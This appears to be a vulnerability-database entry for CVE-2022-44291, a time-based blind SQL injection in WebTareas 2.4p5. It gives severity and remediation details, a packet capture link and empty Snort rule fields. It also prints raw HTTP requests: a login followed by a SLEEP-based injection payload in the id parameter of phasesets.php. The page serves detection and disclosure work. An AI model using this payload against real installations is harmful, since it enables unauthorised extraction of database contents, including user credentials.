🔙 목록으로 돌아가기

CVE-2022-44291: WebTareas 2.4p5 - SQL Injection

TitleWebTareas 2.4p5 - SQL Injection
Authortheamanrawat
SeverityCritical
ImpactAuthenticated attackers can execute time-based blind SQL injection through the id parameter in phasesets.php, potentially extracting sensitive database information including project phases, task data, and user credentials from WebTareas.
RemediationUpdate WebTareas to a version later than 2.4p5 that properly sanitizes and parameterizes the id parameter in phasesets.php.
CVSS Score9.8
EPSS Score0.54961
CVE IDCVE-2022-44291
CWE IDCWE-89
Tags time-based-sqli cve cve2022 sqli webtareas authenticated intrusive webtareas_project vuln

🔍 Vulnerability Description

webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.

🌐 HTTP Request

POST /general/login.php?session=false HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 538
Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525
Accept-Encoding: gzip

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="action"



login

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="loginForm"



sgXuhK

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="passwordForm"



p01cmM

-----------------------------3023071625140724693672385525

Content-Disposition: form-data; name="loginSubmit"



Log In

-----------------------------3023071625140724693672385525--
GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-44291.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-44291.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A